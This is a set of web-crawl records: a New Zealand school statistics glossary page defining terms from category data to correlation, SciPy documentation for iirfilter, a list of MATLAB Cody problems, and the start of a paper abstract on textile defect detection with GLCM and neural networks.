[ "Te Kete Ipurangi\nCommunities\nSchools\n\n# Glossary page C\n\nA  B  C  D  E  F G  H  I J K  L  M  N  O  P  Q  R  S  T  U  V  W X Y Z\n\n## Category data\n\nData in which the values can be organised into distinct groups. These distinct groups (or categories) must be chosen so that they do not overlap and that every value belongs to one and only one group, and there should be no doubt as to which one.\n\nThe term ‘category data’ is used with two different meanings. The curriculum uses a meaning that puts no restriction on whether or not the categories have a natural ordering. This use of category data has the same meaning as qualitative data. The other meaning restricts category data to categories that do not have a natural ordering.\n\n### Example\n\nThe eye colours of a class of year 9 students.\n\nAlternative: categorical data\n\nSee: qualitative data\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels 1, 2, 3, 4, (5), (6), (7), (8)\n\n## Category variable\n\nA property that may have different values for different individuals and for which these values can be organised into distinct groups. These distinct groups (or categories) must be chosen so that they do not overlap and that every value belongs to one and only one group, and there should be no doubt as to which one.\n\nThe term ‘category variable’ is used with two different meanings. The curriculum uses a meaning that puts no restriction on whether or not the categories have a natural ordering. This use of category variable has the same meaning as qualitative variable. The other meaning of category variable is restricted to categories which do not have a natural ordering.\n\n### Example\n\nThe eye colours of a class of year 9 students.\n\nAlternative: categorical variable\n\nSee: qualitative variable\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (4), (5), (6), (7), (8)\n\n## Causal-relationship claim\n\nA statement that asserts that changes in a phenomenon (the response) are caused by differences in a received treatment or by differences in the value of another variable (an explanatory variable).\n\nSuch claims can be justified only if the observed phenomenon is a response from a well-designed and well-conducted experiment.\n\n### Curriculum achievement objectives reference\n\nStatistical literacy: Level 8\n\n## Census\n\nA study that attempts to measure every unit in a population.\n\n### Curriculum achievement objectives references\n\nStatistical literacy: Levels (7), (8)\n\n## Central limit theorem\n\nThe fact that the sampling distribution of the sample mean of a numerical variable becomes closer to the normal distribution as the sample size increases. The sample means are from random samples from some population.\n\nThis result applies regardless of the shape of the population distribution of the numerical variable.\n\n‘Central’ is used in this term because there is a tendency for values of the sample mean to be closer to the ‘centre’ of the population distribution than individual values are. This tendency strengthens as the sample size increases.\n\n‘Limit’ is used in this term because the closeness or approximation to the normal distribution improves as the sample size increases.\n\nSee: sampling distribution\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: Level 8\n\n## Centred moving average\n\nSee: moving mean\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Chance\n\nA concept that applies to situations that have a number of possible outcomes, none of which is certain to occur when a trial of the situation is performed.\n\nTwo examples of situations that involve elements of chance follow.\n\n### Example 1\n\nA person will be selected and their eye colour recorded.\n\n### Example 2\n\nTwo dice will be rolled and the numbers on each die recorded.\n\n### Curriculum achievement objectives references\n\nProbability: All levels\n\n## Class interval\n\nOne of the non-overlapping intervals into which the range of values of measurement data, and occasionally whole-number data, is divided. Each value in the distribution must be able to be classified into exactly one of these intervals.\n\n### Example 1 (Measurement data)\n\nThe number of hours of sunshine per week in Grey Lynn, Auckland, from Monday 2 January 2006 to Sunday 31 December 2006 are recorded in the frequency table below. The class intervals used to group the values of weekly hours of sunshine are listed in the first column of the table.\n\n Hours of sunshine Number of weeks 5 to less than 10 2 10 to less than 15 2 15 to less than 20 5 20 to less than 25 9 25 to less than 30 12 30 to less than 35 10 35 to less than 40 5 40 to less than 45 6 45 to less than 50 1 Total 52\n\n### Example 2 (Whole-number data)\n\nStudents enrolled in an introductory statistics course at the University of Auckland were asked to complete an online questionnaire. One of the questions asked them to enter the number of countries they had visited, other than New Zealand. The class intervals used to group the values are listed in the first column of the table.\n\n Number of countries visited Frequency 0 – 4 446 5 – 9 172 10 – 14 69 15 – 19 19 20 – 24 14 25 – 29 4 30 – 34 3 Total 727\n\nAlternatives: bin, class\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (4), (5), (6), (7), (8)\n\n## Cleaning data\n\nThe process of finding and correcting (or removing) errors in a data set in order to improve its quality.\n\nMistakes in data can arise in many ways, such as:\n\n• A respondent may interpret a question in a different way from that intended by the writer of the question.\n• An experimenter may misread a measuring instrument.\n• A data entry person may mistype a value.\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels 5, (6), (7), (8)\n\n## Cluster (in a distribution of a numerical variable)\n\nA distinct grouping of neighbouring values in a distribution of a numerical variable that occur noticeably more often than values on each side of these neighbouring values. If a distribution has two or more clusters, then they will be separated by places where values are spread thinly or are absent.\n\nIn distributions with a small number of values or with values that are spread thinly, some values may appear to form small clusters. Such groupings may be due to natural variation (see sources of variation), and these groupings may not be apparent if the distribution had more values. Be cautious about commenting on small groupings in such distributions.\n\nFor the use of ‘cluster’ in cluster sampling see the description of cluster sampling.\n\n### Example 1\n\nThe number of hours of sunshine per week in Grey Lynn, Auckland, from Monday 2 January 2006 to Sunday 31 December 2006 are displayed in the dot plot below.", null, "If you cannot view or read this graph, select this link to open a text version.\n\nFrom the greater density of the dots in the plot, we can see that the values have one cluster from about 23 to 37 hours per week of sunshine.\n\n### Example 2\n\nA sample of 40 parents was asked about the time they spent in paid work in the previous week. Their responses are displayed in the dot plot below.", null, "If you cannot view or read this graph, select this link to open a text version.\n\nThere are three clusters in the distribution: a group who did a very small amount or no paid work, a group who did part-time work (about 20 hours) and a group who did full-time work (about 35 to 40 hours).\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (2), (3), (4), (5), (6)\nStatistical literacy: Levels (2), (3), (4), (5), (6)\n\n## Cluster sampling\n\nA method of sampling in which the population is split into naturally forming groups (the clusters), with the groups having similar characteristics that are known for the whole population. A simple random sample of clusters is selected. Either the individuals in these clusters form the sample or simple random samples chosen from each selected cluster form the sample.\n\n### Example\n\nConsider obtaining a sample of secondary school students from Wellington. The secondary schools in Wellington are suitable clusters. A simple random sample of these schools is selected. Either all students from the selected schools form the sample or simple random samples chosen from each selected school form the sample.\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (7), (8)\n\n## Coefficient of determination (in linear regression)\n\nThe proportion of the variation in the response variable that is explained by the regression model.\n\nIf there is a perfect linear relationship between the explanatory variable and the response variable, there will be some variation in the values of the response variable because of the variation that exists in the values of the explanatory variable. In any real data, there will be more variation in the values of the response variable than the variation that would be explained by a perfect linear relationship. The total variation in the values of the response variable can be regarded as being made up of variation explained by the linear regression model and unexplained variation. The coefficient of determination is the proportion of the explained variation relative to the total variation.\n\nIf the points are close to a straight line, then the unexplained variation will be a small proportion of the total variation in the values of the response variable. This means that the closer the coefficient of determination is to 1, the stronger the linear relationship.\n\nThe coefficient of determination is also used in more advanced forms of regression, and is usually represented by R2. In linear regression, the coefficient of determination, R2, is equal to the square of the correlation coefficient, i.e., R2 = r2.\n\n### Example\n\nThe actual weights and self-perceived ideal weights of a random sample of 40 female students enrolled in an introductory statistics course at the University of Auckland are displayed on the scatter plot below. A regression line has been drawn. The equation of the regression line is\npredicted y = 0.6089x + 18.661 or predicted ideal weight = 0.6089 × actual weight + 18.661", null, "If you cannot view or read this graph, select this link to open a text version.\n\nThe coefficient of determination R2 = 0.822\n\nThis means that 82.2% of the variation in the ideal weights is explained by the regression model (i.e., by the equation of the regression line).\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Combined event\n\nAn event that consists of the occurrence of two or more events.\n\nTwo different ways of combining events A and B are: A or B, A and B.\n\nA or B is the event consisting of outcomes that are either in A or B or both.", null, "If you cannot view or read this diagram, select this link to open a text version.\n\nA and B is the event consisting of outcomes that are common to both A and B.", null, "If you cannot view or read this diagram, select this link to open a text version.\n\n### Example\n\nSuppose we have a group of men and women and each person is a possible outcome of a probability activity. A is the event that a person is a woman and B is the event that a person is taller than 170cm.\n\nConsider A and B. The outcomes in the combined event A and B will consist of the women who are taller than 170cm.\n\nConsider A or B. The outcomes in the combined event A or B will consist of all of the women as well as the men taller than 170cm. An alternative description is that the combined event A or B will consist of all people taller than 170cm as well as the women who are not taller than 170cm.\n\nAlternative: compound event, joint event\n\n### Curriculum achievement objectives reference\n\nProbability: Level 8\n\n## Complementary event\n\nWith reference to a given event, the event that the given event does not occur. In other words, the complementary event to an event A is the event consisting of all of the possible outcomes that are not in event A.\n\nThere are several symbols for the complement of event A. The most common are A' and Ā.", null, "If you cannot view or read this diagram, select this link to open a text version.\n\n### Example\n\nSuppose we have a group of men and women and each person is a possible outcome of a probability activity. If A is the event that a person is aged 30 years or more, then the complement of event A, A', consists of the people aged less than 30 years.\n\n### Curriculum achievement objectives reference\n\nProbability: (Level 8)\n\n## Conditional event\n\nAn event that consists of the occurrence of one event based on the knowledge that another event has already occurred.\n\nThe conditional event consisting of event A occurring, knowing that event B has already occurred, is written as A | B, and is expressed as ‘event A given event B’. Event B is considered to be the ‘condition’ in the conditional event A | B.\n\nThe probability of the conditional event A | B, P(A|B) = P(A and B)/P(B) .\n\nFor a justification of the above formula, see the example below.\n\n### Example\n\nSuppose we have a group of men and women and each person is a possible outcome of the probability activity of selecting a person. A is the event that a person is a woman, and B is the event that a person is taller than 170cm.\n\nConsider A | B.\n\nGiven that B has occurred, the outcomes of interest are now restricted to those taller than 170cm.\n\nA | B will then be the women of those taller than 170cm.\n\nSuppose that the genders and heights of the people were as displayed in the two-way table below.\n\n Height Taller than 170cm Not taller than 170cm Total Gender Male 68 15 83 Female 28 89 117 Total 96 104 200\n\nGiven that B has occurred, the outcomes of interest are the 96 people taller than 170cm.\n\nIf a person is randomly selected from these 96 people, then the probability that the person is female is P(A|B) = 28/96 = 0.292.\n\nIf both parts of the fraction are divided by 200, this becomes P(A|B) = (28/200)/(96/200) = P(A and B)/P(B)\n\n### Curriculum achievement objectives reference\n\nProbability: Level 8\n\n## Confidence interval\n\nAn interval estimate of a population parameter. A confidence interval is therefore an interval of values, calculated from a random sample taken from the population, of which any number in the interval is a possible value for a population parameter.\n\nThe word ‘confidence’ is used in the term because the method that produces the confidence interval has a specified success rate (confidence level) for the percentage of times such intervals contain the true value of the population parameter in the long run. 95% is commonly used as the confidence level.\n\nSee: bootstrap confidence interval, bootstrapping, margin of error\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: Level 8\n\n## Confidence level\n\nA specified percentage success rate for a method that produces a confidence interval, meaning that the method has this rate for the percentage of times such intervals contain the true value of the population parameter in the long run.\n\nThe most commonly used confidence level is 95%.\n\nThe confidence level associated with the process of forming a bootstrap confidence interval for a parameter cannot be determined accurately but, in most cases, the confidence level will be about 90% or higher (especially if any samples used are quite large). That is, just because the central 95% of estimates was used to form the bootstrap confidence interval we cannot say that the confidence level is 95%.\n\nThis confidence level concept can be illustrated using the ‘Confidence interval coverage’ module from the iNZightVIT software. The module produced the following output. Note that to use this module you must have data on every unit in the population.", null, "If you cannot view or read this diagram/graph, select this link to open a text version.\n\nThe population used is 500 students from the CensusAtSchool database. This is multivariate data. The variable ‘rightfoot’ (the length of a student’s right foot, in centimetres), the quantity ‘mean’, the confidence interval method ‘bootstrap: percentile’, the sample size ‘30’ and the number of repetitions ‘1000’ were selected.\n\nThe ‘Population’ plot shows the population distribution of the right foot lengths of the 500 students in the population. The vertical line shows the true population mean (about 23.4cm). The darker dots show the final random sample selected.\n\nThe true population mean is also shown as a dotted line through all three plots.\n\nThe ‘Sample’ plot shows the 30 foot lengths from the sample, the sample mean (vertical line) and the bootstrap confidence interval (horizontal line).\n\nThe ‘CI history’ plot shows bootstrap confidence intervals constructed from some of the samples. The bootstrap confidence intervals that contained (covered) the true population mean are shaded in a light colour (green) and the bootstrap confidence intervals that did not contain (did not cover) the true population mean are shaded in a dark colour (red). The box gives the percentage success rate of the bootstrap confidence interval process based on 1000 samples. The success rate of 94.7% estimates the confidence level when using the bootstrap confidence interval process on this population and for this sample size.\n\nAlternative: coverage\n\nSee: bootstrap confidence interval, bootstrapping\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Confidence limits\n\nThe lower and upper boundaries of a confidence interval.\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Continuous distribution\n\nThe variation in the values of a variable that can take any value in an (appropriately-sized) interval of numbers.\n\nA continuous distribution may be an experimental distribution, a sample distribution, a population distribution, or a theoretical probability distribution of a measurement variable. Although the recorded values in an experimental or sample distribution may be rounded, the distribution is usually still regarded as being continuous.\n\n### Example\n\nAt Levels 7 and 8, the normal distribution is an example of a continuous theoretical probability distribution.\n\nSee: distribution\n\n### Curriculum achievement objectives references\n\nStatistical investigation: Levels (5), (6), (7), (8)\n\nProbability: Levels (5), (6), 7, (8)\n\n## Continuous random variable\n\nA random variable that can take any value in an (appropriately-sized) interval of numbers.\n\n### Example\n\nThe height of a randomly selected individual from a population.\n\n### Curriculum achievement objectives references\n\nProbability: Levels (7), 8\n\n## Correlation\n\nThe strength and direction of the relationship between two numerical variables.\n\nIn assessing the correlation between two numerical variables, one variable does not need to be regarded as the explanatory variable and the other as the response variable, as is necessary in linear regression.\n\nTwo numerical variables have positive correlation if the values of one variable tend to increase as the values of the other variable increase.\n\nTwo numerical variables have negative correlation if the values of one variable tend to decrease as the values of the other variable increase.\n\nCorrelation is often measured by a correlation coefficient, the most common of which measures the strength and direction of the linear relationship between two numerical variables. In this linear case, correlation describes how close points on a scatter plot are to lying on a straight line.\n\nSee: correlation coefficient\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: Level (8)\n\n## Correlation coefficient\n\nA number between -1 and 1 calculated so that the number represents the strength and direction of the linear relationship between two numerical variables.\n\nA correlation coefficient of 1 indicates a perfect linear relationship with positive slope. A correlation coefficient of -1 indicates a perfect linear relationship with negative slope.\n\nThe most widely used correlation coefficient is called Pearson’s (product-moment) correlation coefficient, and it is usually represented by r.\nSome other properties of the correlation coefficient, r:\n\n1. The closer the value of r is to 1 or -1, the stronger the linear relationship.\n2. r has no units.\n3. r is unchanged if the axes on which the variables are plotted are reversed.\n4. If the units of one, or both, of the variables are changed, then r is unchanged.\n\n### Example\n\nThe actual weights and self-perceived ideal weights of a random sample of 40 female students enrolled in an introductory statistics course at the University of Auckland are displayed on the scatter plot below.", null, "If you cannot view or read this graph, select this link to open a text version.\n\nThe correlation coefficient r = 0.906\n\nSee: coefficient of determination (in linear regression), correlation\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\n## Cyclical component (for time-series data)\n\nLong-term variations in time-series data that repeat in a reasonably systematic way over time. The cyclical component can often be represented by a wave-shaped curve, which represents alternating periods of expansion and contraction. The successive waves of the curve may have different periods.\n\nCyclical components are difficult to analyse, and at Level 8 cyclical components can be described along with the trend.\n\nSee: time-series data\n\n### Curriculum achievement objectives reference\n\nStatistical investigation: (Level 8)\n\nLast updated September 27, 2013" ]
[ null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_graph1/8720-2-eng-NZ/Glossaryc_graph1.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_graph2/8723-2-eng-NZ/Glossaryc_graph2.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_graph3/8726-2-eng-NZ/Glossaryc_graph3.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_diagram1/8729-2-eng-NZ/Glossaryc_diagram1.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_diagram2/8732-2-eng-NZ/Glossaryc_diagram2.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_diagram3/8735-1-eng-NZ/Glossaryc_diagram3.gif", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/confidence-level/28347-1-eng-NZ/Confidence-level.png", null, "http://seniorsecondary.tki.org.nz/var/tki-sec/storage/images/media/images/mathematics-and-statistics/glossary/glossaryc_graph4/8747-2-eng-NZ/Glossaryc_graph4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9057384,"math_prob":0.9143935,"size":21297,"snap":"2021-43-2021-49","text_gpt3_token_len":4461,"char_repetition_ratio":0.14399098,"word_repetition_ratio":0.22332859,"special_character_ratio":0.21434943,"punctuation_ratio":0.08929039,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.986776,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T10:54:36Z\",\"WARC-Record-ID\":\"<urn:uuid:0c0c44e6-18d8-4bed-82f7-1e014812b8ba>\",\"Content-Length\":\"267607\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d96c5862-1534-4209-9eaf-973fcbb16b30>\",\"WARC-Concurrent-To\":\"<urn:uuid:70a519ee-3de4-4c85-86a0-23a11b3d7349>\",\"WARC-IP-Address\":\"185.125.86.67\",\"WARC-Target-URI\":\"https://seniorsecondary.tki.org.nz/Mathematics-and-statistics/Glossary/Glossary-page-C\",\"WARC-Payload-Digest\":\"sha1:7MBVS7EKWD6TAZ64JCUMTG3AOSWYWCPM\",\"WARC-Block-Digest\":\"sha1:ARYXA5D7O7EMN7UO7VBG4IJLSA7OQAGO\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588113.25_warc_CC-MAIN-20211027084718-20211027114718-00047.warc.gz\"}"}
https://docs.scipy.org/doc/scipy-1.1.0/reference/generated/scipy.signal.iirfilter.html
[ "# scipy.signal.iirfilter¶\n\nscipy.signal.iirfilter(N, Wn, rp=None, rs=None, btype='band', analog=False, ftype='butter', output='ba')[source]\n\nIIR digital and analog filter design given order and critical points.\n\nDesign an Nth-order digital or analog filter and return the filter coefficients.\n\nParameters: N : int The order of the filter. Wn : array_like A scalar or length-2 sequence giving the critical frequencies. For digital filters, Wn is normalized from 0 to 1, where 1 is the Nyquist frequency, pi radians/sample. (Wn is thus in half-cycles / sample.) For analog filters, Wn is an angular frequency (e.g. rad/s). rp : float, optional For Chebyshev and elliptic filters, provides the maximum ripple in the passband. (dB) rs : float, optional For Chebyshev and elliptic filters, provides the minimum attenuation in the stop band. (dB) btype : {‘bandpass’, ‘lowpass’, ‘highpass’, ‘bandstop’}, optional The type of filter. Default is ‘bandpass’. analog : bool, optional When True, return an analog filter, otherwise a digital filter is returned. ftype : str, optional The type of IIR filter to design: Butterworth : ‘butter’ Chebyshev I : ‘cheby1’ Chebyshev II : ‘cheby2’ Cauer/elliptic: ‘ellip’ Bessel/Thomson: ‘bessel’ output : {‘ba’, ‘zpk’, ‘sos’}, optional Type of output: numerator/denominator (‘ba’), pole-zero (‘zpk’), or second-order sections (‘sos’). Default is ‘ba’. b, a : ndarray, ndarray Numerator (b) and denominator (a) polynomials of the IIR filter. Only returned if output='ba'. z, p, k : ndarray, ndarray, float Zeros, poles, and system gain of the IIR filter transfer function. Only returned if output='zpk'. sos : ndarray Second-order sections representation of the IIR filter. Only returned if output=='sos'.\n\nbutter\nFilter design using order and critical points\nbuttord\nFind order and critical points from passband and stopband spec\niirdesign\nGeneral filter design using passband and stopband spec\n\nNotes\n\nThe 'sos' output parameter was added in 0.16.0.\n\nExamples\n\nGenerate a 17th-order Chebyshev II bandpass filter and plot the frequency response:\n\n>>> from scipy import signal\n>>> import matplotlib.pyplot as plt\n\n>>> b, a = signal.iirfilter(17, [50, 200], rs=60, btype='band',\n... analog=True, ftype='cheby2')\n>>> w, h = signal.freqs(b, a, 1000)\n>>> fig = plt.figure()\n>>> ax.semilogx(w, 20 * np.log10(abs(h)))\n>>> ax.set_title('Chebyshev Type II bandpass frequency response')\n>>> ax.set_ylabel('Amplitude [dB]')\n>>> ax.axis((10, 1000, -100, 10))\n>>> ax.grid(which='both', axis='both')\n>>> plt.show()", null, "#### Previous topic\n\nscipy.signal.iirdesign\n\n#### Next topic\n\nscipy.signal.kaiser_atten" ]
[ null, "https://docs.scipy.org/doc/scipy-1.1.0/reference/_images/scipy-signal-iirfilter-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63115895,"math_prob":0.67553574,"size":2655,"snap":"2023-40-2023-50","text_gpt3_token_len":771,"char_repetition_ratio":0.1214636,"word_repetition_ratio":0.046153847,"special_character_ratio":0.2922787,"punctuation_ratio":0.2263056,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97299266,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-26T02:28:55Z\",\"WARC-Record-ID\":\"<urn:uuid:1dd76a3d-9bca-4a39-b1c4-82f6af741834>\",\"Content-Length\":\"16953\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f34f098f-6a28-463f-8f3a-aab8c697d2af>\",\"WARC-Concurrent-To\":\"<urn:uuid:79331823-6f75-4447-b5b5-c01e229600a9>\",\"WARC-IP-Address\":\"50.17.248.72\",\"WARC-Target-URI\":\"https://docs.scipy.org/doc/scipy-1.1.0/reference/generated/scipy.signal.iirfilter.html\",\"WARC-Payload-Digest\":\"sha1:BB2DCUTFA6UZ46RHXO26VBSZ7I4WESHB\",\"WARC-Block-Digest\":\"sha1:P5D3UZOQYCY75RHDFSUUASI6BSUJYZTE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510130.53_warc_CC-MAIN-20230926011608-20230926041608-00200.warc.gz\"}"}
https://jp.mathworks.com/matlabcentral/profile/authors/21441977
[ "Community Profile", null, "# Cuong Nguyen\n\nLast seen: 2ヶ月 前 2021 以来アクティブ\n\n#### Statistics\n\n•", null, "•", null, "•", null, "•", null, "•", null, "•", null, "バッジを表示\n\n#### Content Feed\n\nFind nearest prime number less than input number\nFind nearest prime number less than input number. For example: if the input number is 125, then the nearest prime number whi...\n\n2ヶ月 前\n\nLargest Twin Primes\n<http://en.wikipedia.org/wiki/Twin_prime Twin primes> are primes p1, p2 = p1 + 2 such that both p1 and p2 are prime numbers. Giv...\n\n2ヶ月 前\n\nMersenne Primes\nA Mersenne prime is a prime number of the form M = 2^p - 1, where p is another prime number. For example, 31 is a Mersenne prim...\n\n2ヶ月 前\n\nMersenne Primes vs. All Primes\nA Mersenne prime (M) is a prime number of the form M = 2^p - 1, where p is another prime number. <https://www.mathworks.com/matl...\n\n2ヶ月 前\n\nSophie Germain prime\nIn number theory, a prime number p is a *Sophie Germain prime* if 2p + 1 is also prime. For example, 23 is a Sophie Germain prim...\n\n2ヶ月 前\n\nFactorize THIS, buddy\nList the prime factors for the input number, in decreasing order. List each factor only once, even if the factorization includes...\n\n2ヶ月 前\n\nMultiples of a Number in a Given Range\nGiven an integer factor _f_ and a range defined by _xlow_ and _xhigh_ inclusive, return a vector of the multiples of _f_ that fa...\n\n2ヶ月 前\n\nProper Factors\nGenerate the proper factors of input integer x and return them in ascending order. For more information on proper factors, refer...\n\n2ヶ月 前\n\nGet all prime factors\nList the prime factors for the input number, in decreasing order. List each factor. If the prime factor occurs twice, list it as...\n\n2ヶ月 前\n\nMake roundn function\nMake roundn function using round. x=0.55555 y=function(x,1) y=1 y=function(x,2) y=0.6 y=function(x,3) ...\n\n2ヶ月 前\n\nRounding off numbers to n decimals\nInspired by a mistake in one of the problems I created, I created this problem where you have to round off a floating point numb...\n\n2ヶ月 前\n\nMatlab Basics - Rounding III\nWrite a script to round a large number to the nearest 10,000 e.g. x = 12,358,466,243 --> y = 12,358,470,000\n\n2ヶ月 前\n\nMatlab Basics - Rounding II\nWrite a script to round a variable x to 3 decimal places: e.g. x = 2.3456 --> y = 2.346\n\n2ヶ月 前\n\nMATLAB Basic: rounding III\n\n2ヶ月 前\n\nCheck that number is whole number\nCheck that number is whole number Say x=15, then answer is 1. x=15.2 , then answer is 0. http://en.wikipedia.org/wiki/Whole_numb...\n\n2ヶ月 前\n\nMATLAB Basic: rounding IV\n\n2ヶ月 前\n\nMATLAB Basic: rounding II\n\n2ヶ月 前\n\nMATLAB Basic: rounding\nDo rounding near to zero Example: -8.8, answer -8 +8.1 answer 8\n\n2ヶ月 前\n\nVector creation\nCreate a vector using square brackets going from 1 to the given value x in steps on 1. Hint: use increment.\n\n2ヶ月 前\n\nDoubling elements in a vector\nGiven the vector A, return B in which all numbers in A are doubling. So for: A = [ 1 5 8 ] then B = [ 1 1 5 ...\n\n2ヶ月 前\n\nCreate a vector\nCreate a vector from 0 to n by intervals of 2.\n\n2ヶ月 前\n\nFlip the vector from right to left\nFlip the vector from right to left. Examples x=[1:5], then y=[5 4 3 2 1] x=[1 4 6], then y=[6 4 1]; Request not ...\n\n2ヶ月 前\n\nWhether the input is vector?\nGiven the input x, return 1 if x is vector or else 0.\n\n2ヶ月 前\n\nFind max\nFind the maximum value of a given vector or matrix.\n\n2ヶ月 前\n\nGet the length of a given vector\nGiven a vector x, the output y should equal the length of x.\n\n2ヶ月 前\n\nInner product of two vectors\nFind the inner product of two vectors.\n\n2ヶ月 前\n\nArrange Vector in descending order\nIf x=[0,3,4,2,1] then y=[4,3,2,1,0]\n\n2ヶ月 前\n\nCan we make a triangle?\nGiven three positive number, check whether a triangle can be made with these sides length or not. remember that in a triangle su...\n\n2ヶ月 前\n\nFind the sides of an isosceles triangle when given its area and height from its base to apex\nFind the sides of an isosceles triangle when given its area and the height from its base to apex. For example, with A=12 and ...\n\n2ヶ月 前\n\nHeight of a right-angled triangle\nGiven numbers a, b and c, find the height of the right angled triangle with sides a and b and hypotenuse c, for the base c. If a...\n\n2ヶ月 前" ]
[ null, "https://jp.mathworks.com/responsive_image/150/150/0/0/0/cache/matlabcentral/profiles/21441977_1617952745968_DEF.jpg", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/community_authored_group.png", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/project_euler.png", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/mathworks_generic_group.png", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/introduction_to_matlab.png", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/CUP_challenge_master.png", null, "https://jp.mathworks.com/images/responsive/supporting/matlabcentral/cody/badges/solver.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6910562,"math_prob":0.9964693,"size":4460,"snap":"2021-43-2021-49","text_gpt3_token_len":1685,"char_repetition_ratio":0.1806553,"word_repetition_ratio":0.14251782,"special_character_ratio":0.29663676,"punctuation_ratio":0.1641791,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9994772,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,2,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-22T15:00:58Z\",\"WARC-Record-ID\":\"<urn:uuid:c1135540-5391-4678-8b58-4dd8e89f3bb1>\",\"Content-Length\":\"101481\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8d695902-9160-4daa-adeb-47ddc74032c9>\",\"WARC-Concurrent-To\":\"<urn:uuid:da5f1401-bccc-47dd-9bc4-bc52597bbfd4>\",\"WARC-IP-Address\":\"184.25.188.167\",\"WARC-Target-URI\":\"https://jp.mathworks.com/matlabcentral/profile/authors/21441977\",\"WARC-Payload-Digest\":\"sha1:X3SFEU6RDEX777AJ3LG3P3RIA3CDNUAU\",\"WARC-Block-Digest\":\"sha1:HSYXVCZG6X6JEPGZ5X4RLEJSKZPH7H2K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585516.51_warc_CC-MAIN-20211022145907-20211022175907-00117.warc.gz\"}"}
https://www.scirp.org/journal/paperinformation.aspx?paperid=61639
[ "Identification of Textile Defects Based on GLCM and Neural Networks\n\nAbstract\n\nIn modern textile industry, Tissue online Automatic Inspection (TAI) is becoming an attractive alternative to Human Vision Inspection (HVI). HVI needs a high level of attention nevertheless leading to low performance in terms of tissue inspection. Based on the co-occurrence matrix and its statistical features, as an approach for defects textile identification in the digital image, TAI can potentially provide an objective and reliable evaluation on the fabric production quality. The goal of most TAI systems is to detect the presence of faults in textiles and accurately locate the position of the defects. The motivation behind the fabric defects identification is to enable an on-line quality control of the weaving process. In this paper, we proposed a method based on texture analysis and neural networks to identify the textile defects. A feature extractor is designed based on Gray Level Co-occurrence Matrix (GLCM). A neural network is used as a classifier to identify the textile defects. The numerical simulation showed that the error recognition rates were 100% for the training and 100%, 91% for the best and worst testing respectively.\n\nShare and Cite:\n\nAzim, G. (2015) Identification of Textile Defects Based on GLCM and Neural Networks. Journal of Computer and Communications, 3, 1-8. doi: 10.4236/jcc.2015.312001.\n\nReceived 7 October 2015; accepted 29 November 2015; published 2 December 2015", null, "", null, "1. Introduction\n\nTexture analysis is necessary for many computer image analysis applications such as classification, detection, or segmentation of images. In the other hand, defect detection is an important problem in fabric quality control process. At present, the texture quality identification is manually performed. Therefore, Tissue online Automatic Inspection (TAI) increases the efficiency of production lines and improve the quality of the products as well. Many attempts have been made based on three different approaches: statistical, spectral, and model based .\n\nIn this recherche paper, we investigate the potential of the Gray Level Co-occurrence Matrix 